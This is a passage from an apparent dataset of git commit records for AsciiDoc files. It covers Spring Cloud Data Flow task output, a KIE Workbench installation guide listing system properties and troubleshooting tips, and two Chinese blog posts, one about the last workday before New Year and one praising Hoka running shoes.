list\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551 Task Name \u2502ID\u2502 Start Time \u2502 End Time \u2502Exit Code\u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u2551printTimeStamp\u25021 \u2502Wed Feb 28 16:42:21 EST 2018\u2502Wed Feb 28 16:42:21 EST 2018\u25020 \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n+\nYou can obtain additional information by running the command `task execution status`, as the following example (with its output) shows:\n+\n====\n[source,bash]\n----\ndataflow:>task execution status --id 1\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551 Key \u2502 Value \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u2551Id \u25021 \u2551\n\u2551Name \u2502printTimeStamp \u2551\n\u2551Arguments \u2502[--spring.cloud.task.executionid=1] \u2551\n\u2551Job Execution Ids \u2502[] \u2551\n\u2551Start Time \u2502Wed Feb 28 16:42:21 EST 2018 \u2551\n\u2551End Time \u2502Wed Feb 28 16:42:21 EST 2018 \u2551\n\u2551Exit Code \u25020 \u2551\n\u2551Exit Message \u2502 \u2551\n\u2551Error Message \u2502 \u2551\n\u2551External Execution Id \u2502printTimeStamp-ab86b2cc-0508-4c1e-b33d-b3896d17fed7\u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n\nThe <<spring-cloud-dataflow-task>> section has more information on the lifecycle of Tasks and how to use\n<<spring-cloud-dataflow-composed-tasks>>, which let you create a directed graph where each node of the graph is a task application.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b1d0d2e30ab57f2033dce67fc2fda041d43ce35f","subject":"Fix image ref location","message":"Fix image ref location\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft.adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6fe91cdd0b5972246823c46e0167f6078ea841ac","subject":"update description","message":"update description","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/implementation_details.adoc","new_file":"content\/writings\/implementation_details.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"60f0e1d1b645869182984a2b81814387cb3c812c","subject":"AF-1709: Documenting new system property (#1341)","message":"AF-1709: Documenting new system property (#1341)\n\n","repos":"manstis\/kie-docs,jomarko\/kie-docs,manstis\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs,michelehaglund\/kie-docs","old_file":"doc-content\/shared-kie-docs\/src\/main\/asciidoc\/Workbench\/Installation\/Installation-section.adoc","new_file":"doc-content\/shared-kie-docs\/src\/main\/asciidoc\/Workbench\/Installation\/Installation-section.adoc","new_contents":"[[_wb.installation]]\n= Installation\n\n[[_wb.warinstallation]]\n== War installation\n\n\nUse the `war` from the workbench distribution zip that corresponds to your application server.\nThe differences between these `war` files are mainly superficial.\nFor example, some JARs might be excluded if the application server already supplies them.\n\n* ``eap7``: tailored for Red Hat JBoss Enterprise Application Platform 7\n* ``wildfly14``: tailored for Wildfly 14\n\n\n[[_wb.workbenchdata]]\n== {CENTRAL} data\n\n\nThe workbench stores its data, by default in the directory ``$WORKING_DIRECTORY\/.niogit``, for example ``wildfly-14.0.1.Final\/bin\/.niogit``, but it can be overridden with the <<_wb.systemproperties,system property>>``-Dorg.uberfire.nio.git.dir``.\n\n[NOTE]\n====\nIn production, make sure to back up the workbench data directory.\n====\n\n[[_wb.systemproperties]]\n== System properties\n\n\nHere's a list of all system properties:\n\n* **``org.kie.workbench.profile``**: Selects the workbench profile. Possible values are `FULL` or `PLANNER_AND_RULES`. A prefix `FULL_` will set the profile and hide the profile preferences from the admin preferences. Default: `FULL`.\n* **``kie.maven.offline.force``**: Forces Maven to behave as offline. If true, disable online dependency resolution. Default: false.\n* **``org.appformer.m2repo.url``**: Location of the for the default Maven repository the workbench uses when looking for dependencies. Usually this points to the Maven repository inside the Workbench for example ``http:\/\/localhost:8080\/kie-wb\/maven2``. Please set this before starting up the Workbench. Default: File path to the inner m2 repository.\n* **``org.uberfire.nio.git.dir``**: Location of the directory ``$$.$$niogit``. Default: working directory\n* **``org.uberfire.nio.git.dirname``**: Name of the git directory. Default: `.niogit`\n* **``org.uberfire.nio.git.proxy.ssh.over.http``**: Defines that SSH should use an HTTP Proxy. Default: `false`\n* **``http.proxyHost``**: Defines the host name of the HTTP Proxy. Default: `null`\n* **``http.proxyPort``**: Defines the host port (integer value) of the HTTP Proxy. Default: `null`\n* **``org.uberfire.nio.git.proxy.ssh.over.https``**: Defines that SSH should use an HTTPS Proxy. Default: `false`\n* **``https.proxyHost``**: Defines the host name of the HTTPS Proxy. Default: `null`\n* **``https.proxyPort``**: Defines the host port (integer value) of the HTTPS Proxy. Default: `null`\n* **``org.uberfire.nio.git.daemon.enabled``**: Enables\/disables git daemon. Default: `true`\n* **``org.uberfire.nio.git.daemon.host``**: If git daemon enabled, uses this property as local host identifier. Default: `localhost`\n* **``org.uberfire.nio.git.daemon.port``**: If git daemon enabled, uses this property as port number. Default: `9418`\n+\n\n[NOTE]\n====\nIf the default or assigned port is already in use, a new port is automatically selected. Ensure that the ports are available and check the log for more information.\n====\n* **``org.uberfire.nio.git.ssh.enabled``**: Enables\/disables ssh daemon. Default: `true`\n* **``org.uberfire.nio.git.ssh.host``**: If ssh daemon enabled, uses this property as local host identifier. Default: `localhost`\n* **``org.uberfire.nio.git.ssh.port``**: If ssh daemon enabled, uses this property as port number. Default: `8001`\n+\n\n[NOTE]\n====\nIf the default or assigned port is already in use, a new port is automatically selected. Ensure that the ports are available and check the log for more information.\n====\n* **``org.uberfire.nio.git.ssh.cert.dir``**: Location of the directory `$$.$$security` where local certificates will be stored. Default: working directory\n* **``org.uberfire.nio.git.ssh.passphrase``**: Passphrase to access your Operating Systems public keystore when cloning `git` repositories with `scp` style URLs; e.g. ``git@github.com:user\/repository.git``.\n* **``org.uberfire.nio.git.ssh.algorithm``**: Algorithm used by SSH. Default: `DSA`\n+\n\n[NOTE]\n====\nIf you plan to use RSA or any algorithm other than DSA, make sure you setup properly your Application Server to use Bouncy Castle JCE library.\n====\n* **``appformer.ssh.keystore``**: Defines the custom SSH keystore to be used with Workbench by specifying a class name. If the property is not available the default SSH keystore is used.\n* **``appformer.ssh.keys.storage.folder``**: When using the default SSH keystore, this parameter defines the storage folder for the user's SSH public keys. If the property is not available the keys are stored in the Workbench ``.security`` folder.\n* **``org.uberfire.metadata.index.dir``**: Place where Lucene `$$.$$index` folder will be stored. Default: working directory\n* **``org.uberfire.ldap.regex.role_mapper``**: Regex pattern used to map LDAP principal names to application role name. Note that the variable `role` must be part of the pattern as it is substited by the application role name when matching a principal value to role name. Default: Not used.\n* **``org.uberfire.sys.repo.monitor.disabled``**: Disable configuration monitor (do not disable unless you know what you're doing). Default: `false`\n* **``org.uberfire.secure.key``**: Secret password used by password encryption. Default: `org.uberfire.admin`\n* **``org.uberfire.secure.alg``**: Crypto algorithm used by password encryption. Default: `PBEWithMD5AndDES`\n* **``org.uberfire.domain``**: security-domain name used by uberfire. Default: `ApplicationRealm`\n* **``appformer.experimental.features``**: enables the _Experimental Features Framework_\n* **``org.guvnor.m2repo.dir``**: Place where Maven repository folder will be stored. Default: working-directory\/repositories\/kie\n* **``org.guvnor.project.gav.check.disabled``**: Disable GAV checks. Default: `false`\n* **``org.kie.demo``**: Enables external clone of a demo application from GitHub.\n* **``org.kie.build.disable-project-explorer``**: Disable automatic build of selected Project in Project Explorer. Default: `false`\n* **``org.kie.verification.disable-dtable-realtime-verification``**: Disables the realtime validation and verification of decision tables. Default: `false`\n* **``org.kie.workbench.controller``**: URL for connecting with a {CONTROLLER}, for example: `ws:\/\/localhost:8080\/kie-server-controller\/websocket\/controller`.\n[NOTE]\n====\nOnly Web Socket protocol is supported for connecting with a {HEADLESS_CONTROLLER}.\nWhen specifying this proporty, the Workbench will automatically disable all the features related to running the embedded {CONTROLLER}.\n====\n* **``org.kie.workbench.controller.user``**: User name for connecting with a {CONTROLLER}. Default: `kieserver`\n* **``org.kie.workbench.controller.pwd``**: Password for connecting with a {CONTROLLER}. Default: `kieserver1!`\n* **``org.kie.workbench.controller.token``**: Token string for connecting with a {CONTROLLER}.\n[NOTE]\n====\nPlease refer to <<usingTokenBasedAuthentication, Using token based authentication>> for more details about how to use token based authentication.\n====\n* **``kie.keystore.keyStoreURL``**: URL to a keystore which should be used for connecting with a {HEADLESS_CONTROLLER}.\n* **``kie.keystore.keyStorePwd``**: Password to a keystore.\n* **``kie.keystore.key.ctrl.alias``**: Alias of the key where password is stored.\n* **``kie.keystore.key.ctrl.pwd``**: Password of an alias with stored password.\n[NOTE]\n====\nPlease refer to <<_securing_password_using_key_store, Securing password using key store>> for more details about how to use a key store for securing your passwords.\n====\n\nTo change one of these system properties in a WildFly or JBoss EAP cluster:\n\n. Edit the file ``$JBOSS_HOME\/domain\/configuration\/host.xml``.\n. Locate the XML elements `server` that belong to the `main-server-group` and add a system property, for example:\n+\n\n[source,xml]\n----\n<system-properties>\n <property name=\"org.uberfire.nio.git.dir\" value=\"...\" boot-time=\"false\"\/>\n ...\n<\/system-properties>\n----\n\n[[_wb.troubleshooting]]\n== Trouble shooting\n\n[[_wb.troubleshootingloadingspinner]]\n=== Loading.. does not disappear and Workbench fails to show\n\n\nThere have been reports that Firewalls in between the server and the browser can interfere with Server Sent Events (SSE) used by the Workbench.\n\nThe issue results in the \"Loading...\" spinner remaining visible and the Workbench failing to materialize.\n\nThe workaround is to disable the Workbench's use of Server Sent Events by adding file `\/WEB-INF\/classes\/ErraiService.properties` to the exploded WAR containing the value ``errai.bus.enable_sse_support=false``.\nRe-package the WAR and re-deploy.\n\nSome Users have also reported disabling Server Sent Events does not resolve the issue. The solution found to work is to configure the JVM to use a different Entropy Gathering Device on Linux for `SecureRandom`. This can be configured by setting System Property `java.security.egd` to `file:\/dev\/.\/urandom`. See http:\/\/stackoverflow.com\/questions\/33166198\/kie-workbench-not-loading-after-login\/39110177#39110177[this] Stack Overflow post for details.\n\nPlease note however this affects the JVM's random number generation and may present other challenges where strong cryptography is required. Configure with caution.\n\n=== Not able to clone KIE Workbench Git repository using ssh protocol.\nGit clients using ssh to interact with the Git server that is bundled with Workbench are authenticated and authorized to perform git commands by the security API that is part of the Uberfire backend server. When using an LDAP security realm, some git clients were not being authorized as expected. This was due to the fact that for non-web clients such as Git via ssh, the principal (i.e., user or group) name assigned to a user by the application server's user registry is the more complex DN associated to that principal by LDAP. The logic of the Uberfire backend server looked for on exact match of roles allowed with the principal name returned and therefore failed.\n\nIt is now possible to control the role-principal matching via the system property\n\n[source, property]\n----\norg.uberfire.ldap.regex.role_mapper\n----\n\nwhich takes as its value a Regex pattern to be applied when matching LDAP principal to role names. The pattern must contain the literal word variable 'role'. During authorization the variable is replaced by each of the allow application roles. If the pattern is matched the role is added to the user.\n\nFor instance, if the DN for the admin group in LDAP is\n\n[source, property]\n----\nDN: cn=admin,ou=groups,dc=example,dc=com\n----\n\nand its intended role is admin, then setting `org.uberfire.ldap.regex.role_mapper` with value\n\n[source, regex]\n----\ncn[\\\\ ]*=[\\\\ ]*role\n----\n\nwill find a match on role 'admin'.\n","old_contents":"[[_wb.installation]]\n= Installation\n\n[[_wb.warinstallation]]\n== War installation\n\n\nUse the `war` from the workbench distribution zip that corresponds to your application server.\nThe differences between these `war` files are mainly superficial.\nFor example, some JARs might be excluded if the application server already supplies them.\n\n* ``eap7``: tailored for Red Hat JBoss Enterprise Application Platform 7\n* ``wildfly14``: tailored for Wildfly 14\n\n\n[[_wb.workbenchdata]]\n== {CENTRAL} data\n\n\nThe workbench stores its data, by default in the directory ``$WORKING_DIRECTORY\/.niogit``, for example ``wildfly-14.0.1.Final\/bin\/.niogit``, but it can be overridden with the <<_wb.systemproperties,system property>>``-Dorg.uberfire.nio.git.dir``.\n\n[NOTE]\n====\nIn production, make sure to back up the workbench data directory.\n====\n\n[[_wb.systemproperties]]\n== System properties\n\n\nHere's a list of all system properties:\n\n* **``kie.maven.offline.force``**: Forces Maven to behave as offline. If true, disable online dependency resolution. Default: false.\n* **``org.appformer.m2repo.url``**: Location of the for the default Maven repository the workbench uses when looking for dependencies. Usually this points to the Maven repository inside the Workbench for example ``http:\/\/localhost:8080\/kie-wb\/maven2``. Please set this before starting up the Workbench. Default: File path to the inner m2 repository.\n* **``org.uberfire.nio.git.dir``**: Location of the directory ``$$.$$niogit``. Default: working directory\n* **``org.uberfire.nio.git.dirname``**: Name of the git directory. Default: `.niogit`\n* **``org.uberfire.nio.git.proxy.ssh.over.http``**: Defines that SSH should use an HTTP Proxy. Default: `false`\n* **``http.proxyHost``**: Defines the host name of the HTTP Proxy. Default: `null`\n* **``http.proxyPort``**: Defines the host port (integer value) of the HTTP Proxy. Default: `null`\n* **``org.uberfire.nio.git.proxy.ssh.over.https``**: Defines that SSH should use an HTTPS Proxy. Default: `false`\n* **``https.proxyHost``**: Defines the host name of the HTTPS Proxy. Default: `null`\n* **``https.proxyPort``**: Defines the host port (integer value) of the HTTPS Proxy. Default: `null`\n* **``org.uberfire.nio.git.daemon.enabled``**: Enables\/disables git daemon. Default: `true`\n* **``org.uberfire.nio.git.daemon.host``**: If git daemon enabled, uses this property as local host identifier. Default: `localhost`\n* **``org.uberfire.nio.git.daemon.port``**: If git daemon enabled, uses this property as port number. Default: `9418`\n+\n\n[NOTE]\n====\nIf the default or assigned port is already in use, a new port is automatically selected. Ensure that the ports are available and check the log for more information.\n====\n* **``org.uberfire.nio.git.ssh.enabled``**: Enables\/disables ssh daemon. Default: `true`\n* **``org.uberfire.nio.git.ssh.host``**: If ssh daemon enabled, uses this property as local host identifier. Default: `localhost`\n* **``org.uberfire.nio.git.ssh.port``**: If ssh daemon enabled, uses this property as port number. Default: `8001`\n+\n\n[NOTE]\n====\nIf the default or assigned port is already in use, a new port is automatically selected. Ensure that the ports are available and check the log for more information.\n====\n* **``org.uberfire.nio.git.ssh.cert.dir``**: Location of the directory `$$.$$security` where local certificates will be stored. Default: working directory\n* **``org.uberfire.nio.git.ssh.passphrase``**: Passphrase to access your Operating Systems public keystore when cloning `git` repositories with `scp` style URLs; e.g. ``git@github.com:user\/repository.git``.\n* **``org.uberfire.nio.git.ssh.algorithm``**: Algorithm used by SSH. Default: `DSA`\n+\n\n[NOTE]\n====\nIf you plan to use RSA or any algorithm other than DSA, make sure you setup properly your Application Server to use Bouncy Castle JCE library.\n====\n* **``appformer.ssh.keystore``**: Defines the custom SSH keystore to be used with Workbench by specifying a class name. If the property is not available the default SSH keystore is used.\n* **``appformer.ssh.keys.storage.folder``**: When using the default SSH keystore, this parameter defines the storage folder for the user's SSH public keys. If the property is not available the keys are stored in the Workbench ``.security`` folder.\n* **``org.uberfire.metadata.index.dir``**: Place where Lucene `$$.$$index` folder will be stored. Default: working directory\n* **``org.uberfire.ldap.regex.role_mapper``**: Regex pattern used to map LDAP principal names to application role name. Note that the variable `role` must be part of the pattern as it is substited by the application role name when matching a principal value to role name. Default: Not used.\n* **``org.uberfire.sys.repo.monitor.disabled``**: Disable configuration monitor (do not disable unless you know what you're doing). Default: `false`\n* **``org.uberfire.secure.key``**: Secret password used by password encryption. Default: `org.uberfire.admin`\n* **``org.uberfire.secure.alg``**: Crypto algorithm used by password encryption. Default: `PBEWithMD5AndDES`\n* **``org.uberfire.domain``**: security-domain name used by uberfire. Default: `ApplicationRealm`\n* **``appformer.experimental.features``**: enables the _Experimental Features Framework_\n* **``org.guvnor.m2repo.dir``**: Place where Maven repository folder will be stored. Default: working-directory\/repositories\/kie\n* **``org.guvnor.project.gav.check.disabled``**: Disable GAV checks. Default: `false`\n* **``org.kie.demo``**: Enables external clone of a demo application from GitHub.\n* **``org.kie.build.disable-project-explorer``**: Disable automatic build of selected Project in Project Explorer. Default: `false`\n* **``org.kie.verification.disable-dtable-realtime-verification``**: Disables the realtime validation and verification of decision tables. Default: `false`\n* **``org.kie.workbench.controller``**: URL for connecting with a {CONTROLLER}, for example: `ws:\/\/localhost:8080\/kie-server-controller\/websocket\/controller`.\n[NOTE]\n====\nOnly Web Socket protocol is supported for connecting with a {HEADLESS_CONTROLLER}.\nWhen specifying this proporty, the Workbench will automatically disable all the features related to running the embedded {CONTROLLER}.\n====\n* **``org.kie.workbench.controller.user``**: User name for connecting with a {CONTROLLER}. Default: `kieserver`\n* **``org.kie.workbench.controller.pwd``**: Password for connecting with a {CONTROLLER}. Default: `kieserver1!`\n* **``org.kie.workbench.controller.token``**: Token string for connecting with a {CONTROLLER}.\n[NOTE]\n====\nPlease refer to <<usingTokenBasedAuthentication, Using token based authentication>> for more details about how to use token based authentication.\n====\n* **``kie.keystore.keyStoreURL``**: URL to a keystore which should be used for connecting with a {HEADLESS_CONTROLLER}.\n* **``kie.keystore.keyStorePwd``**: Password to a keystore.\n* **``kie.keystore.key.ctrl.alias``**: Alias of the key where password is stored.\n* **``kie.keystore.key.ctrl.pwd``**: Password of an alias with stored password.\n[NOTE]\n====\nPlease refer to <<_securing_password_using_key_store, Securing password using key store>> for more details about how to use a key store for securing your passwords.\n====\n\nTo change one of these system properties in a WildFly or JBoss EAP cluster:\n\n. Edit the file ``$JBOSS_HOME\/domain\/configuration\/host.xml``.\n. Locate the XML elements `server` that belong to the `main-server-group` and add a system property, for example:\n+\n\n[source,xml]\n----\n<system-properties>\n <property name=\"org.uberfire.nio.git.dir\" value=\"...\" boot-time=\"false\"\/>\n ...\n<\/system-properties>\n----\n\n[[_wb.troubleshooting]]\n== Trouble shooting\n\n[[_wb.troubleshootingloadingspinner]]\n=== Loading.. does not disappear and Workbench fails to show\n\n\nThere have been reports that Firewalls in between the server and the browser can interfere with Server Sent Events (SSE) used by the Workbench.\n\nThe issue results in the \"Loading...\" spinner remaining visible and the Workbench failing to materialize.\n\nThe workaround is to disable the Workbench's use of Server Sent Events by adding file `\/WEB-INF\/classes\/ErraiService.properties` to the exploded WAR containing the value ``errai.bus.enable_sse_support=false``.\nRe-package the WAR and re-deploy.\n\nSome Users have also reported disabling Server Sent Events does not resolve the issue. The solution found to work is to configure the JVM to use a different Entropy Gathering Device on Linux for `SecureRandom`. This can be configured by setting System Property `java.security.egd` to `file:\/dev\/.\/urandom`. See http:\/\/stackoverflow.com\/questions\/33166198\/kie-workbench-not-loading-after-login\/39110177#39110177[this] Stack Overflow post for details.\n\nPlease note however this affects the JVM's random number generation and may present other challenges where strong cryptography is required. Configure with caution.\n\n=== Not able to clone KIE Workbench Git repository using ssh protocol.\nGit clients using ssh to interact with the Git server that is bundled with Workbench are authenticated and authorized to perform git commands by the security API that is part of the Uberfire backend server. When using an LDAP security realm, some git clients were not being authorized as expected. This was due to the fact that for non-web clients such as Git via ssh, the principal (i.e., user or group) name assigned to a user by the application server's user registry is the more complex DN associated to that principal by LDAP. The logic of the Uberfire backend server looked for on exact match of roles allowed with the principal name returned and therefore failed.\n\nIt is now possible to control the role-principal matching via the system property\n\n[source, property]\n----\norg.uberfire.ldap.regex.role_mapper\n----\n\nwhich takes as its value a Regex pattern to be applied when matching LDAP principal to role names. The pattern must contain the literal word variable 'role'. During authorization the variable is replaced by each of the allow application roles. If the pattern is matched the role is added to the user.\n\nFor instance, if the DN for the admin group in LDAP is\n\n[source, property]\n----\nDN: cn=admin,ou=groups,dc=example,dc=com\n----\n\nand its intended role is admin, then setting `org.uberfire.ldap.regex.role_mapper` with value\n\n[source, regex]\n----\ncn[\\\\ ]*=[\\\\ ]*role\n----\n\nwill find a match on role 'admin'.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b273e430d27f63f92e36ae013f96c3a157996fbd","subject":"Update 2015-02-13-the-last-day.adoc","message":"Update 2015-02-13-the-last-day.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-02-13-the-last-day.adoc","new_file":"_posts\/2015-02-13-the-last-day.adoc","new_contents":"= \u6700\u540e\u4e00\u5929\n:hp-alt-title: the last day\n:published_at: 2015-02-13\n:hp-tags: last, next, \u6700\u540e, \n:hp-image: https:\/\/raw.githubusercontent.com\/senola\/pictures\/master\/background\/background1.jpg\n\n\u6700\u540e\u4e00\u5929\u642c\u7816\uff0c\u642c\u5b8c\u5c31\u53ef\u4ee5\u56de\u5bb6\u8fc7\u5e74\u4e86\uff01\uff01\uff01\uff01\uff01\n\n\n\u8fd9\u5927\u534a\u4e2a\u6708\u53ef\u628a\u6211\u7ed9\u7d2f\u574f\u4e86\uff0c\u5403\u4e0d\u7740\u7761\u4e0d\u9999\u3002\n\n\n\u51fa\u95e8\u5728\u5916\u7279\u522b\u60f3\u5ff5\u7740\u5bb6\uff0c\u5c24\u5176\u662f\u4e34\u8fd1\u8fc7\u5e74\u3002 \n\n\n\u60f3\u770b\u770b\u5bb6\u4e61\uff0c\u770b\u770b\u76f8\u4eb2\u4eec\u6734\u5b9e\u7684\u5fae\u7b11\u3002\n\n\n\u9057\u61be\u7684\u662f\u4eca\u5e74\u6ca1\u6709\u5e74\u7ec8\u5956 \u256e(\u256f\u25bd\u2570)\u256d \n\n\n\u4e0d\u8fc7\uff0c\u8fd8\u662f\u5f88\u559c\u6b22\u8fd9\u4efd\u5de5\u4f5c\uff0c\u559c\u6b22\u8fd9\u91cc\u7684\u4eba\u548c\u4e8b\u3002\n\n\n\u65b0\u7684\u4e00\u5e74\uff0c\u65b0\u7684\u6311\u6218\uff01\u5e74\u540e\u518d\u6218\uff0c\u52a0\u6cb9\uff01\uff01\uff01","old_contents":"= \u6700\u540e\u4e00\u5929\n:hp-alt-title: the last day\n:published_at: 2015-02-13\n:hp-tags: last, next, \u6700\u540e \n:hp-image: https:\/\/raw.githubusercontent.com\/senola\/pictures\/master\/background\/background1.jpg\n\n\u6700\u540e\u4e00\u5929\u642c\u7816\uff0c\u642c\u5b8c\u5c31\u53ef\u4ee5\u56de\u5bb6\u8fc7\u5e74\u4e86\uff01\uff01\uff01\uff01\uff01\n\n\n\u8fd9\u5927\u534a\u4e2a\u6708\u53ef\u628a\u6211\u7ed9\u7d2f\u574f\u4e86\uff0c\u5403\u4e0d\u7740\u7761\u4e0d\u9999\u3002\n\n\n\u51fa\u95e8\u5728\u5916\u7279\u522b\u60f3\u5ff5\u7740\u5bb6\uff0c\u5c24\u5176\u662f\u4e34\u8fd1\u8fc7\u5e74\u3002 \n\n\n\u60f3\u770b\u770b\u5bb6\u4e61\uff0c\u770b\u770b\u76f8\u4eb2\u4eec\u6734\u5b9e\u7684\u5fae\u7b11\u3002\n\n\n\u9057\u61be\u7684\u662f\u4eca\u5e74\u6ca1\u6709\u5e74\u7ec8\u5956 \u256e(\u256f\u25bd\u2570)\u256d \n\n\n\u4e0d\u8fc7\uff0c\u8fd8\u662f\u5f88\u559c\u6b22\u8fd9\u4efd\u5de5\u4f5c\uff0c\u559c\u6b22\u8fd9\u91cc\u7684\u4eba\u548c\u4e8b\u3002\n\n\n\u65b0\u7684\u4e00\u5e74\uff0c\u65b0\u7684\u6311\u6218\uff01\u5e74\u540e\u518d\u6218\uff0c\u52a0\u6cb9\uff01\uff01\uff01","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f526e7de22f4dfe3df4bac9affa7bd0797b918fa","subject":"Update 2015-11-11-Hoka-One-One.adoc","message":"Update 2015-11-11-Hoka-One-One.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-11-Hoka-One-One.adoc","new_file":"_posts\/2015-11-11-Hoka-One-One.adoc","new_contents":"= Hoka One One\n:hp-image: https:\/\/cloud.githubusercontent.com\/assets\/19504323\/15452702\/48719838-202c-11e6-9c52-3d13d17bc909.jpg\n:published_at: 2015-11-11\n:hp-tags: Hoka, Hoka One One, Maximalist, \u8dd1\u6b65, \u8dd1\u978b, \u8fd0\u52a8\u978b, \u7f13\u9707, \u4fdd\u62a4, \u6d77\u6dd8, \u4e9a\u9a6c\u900a\n\n\u5e02\u9762\u4e0a\u7684\u8fd0\u52a8\u978b\u53ef\u4ee5\u8bf4\u4e94\u82b1\u516b\u95e8\uff0c\u4f46\u9009\u62e9\u8d8a\u591a\uff0c\u8d8a\u96be\u9009\u62e9\u3002\u8fd9\u91cc\u6211\u4e3a\u5927\u5bb6\u63a8\u8350\u4e00\u4e2a\u724c\u5b50\uff0c\u53ebHoka One One\u3002\n \n\u8fd9\u662f\u4e00\u4e2a\u6781\u5c0f\u4f17\u7684\u724c\u5b50\uff0c\u4f46\u5b83\u7684\u978b\u5b50\u7edd\u5bf9\u662f\u6211\u7a7f\u8fc7\u6700\u8212\u670d\u7684\uff0c\u53ef\u4ee5\u8bf4\u79d2\u6740Asics, NB, Mizuno, Saucony\u7b49\u4e00\u4f17\u9876\u7ea7\u8fd0\u52a8\u978b\u54c1\u724c\u3002\n \n\u662f\u4ec0\u4e48\u8ba9Hoka\u5982\u6b64\u5f3a\u5927\uff1f\n 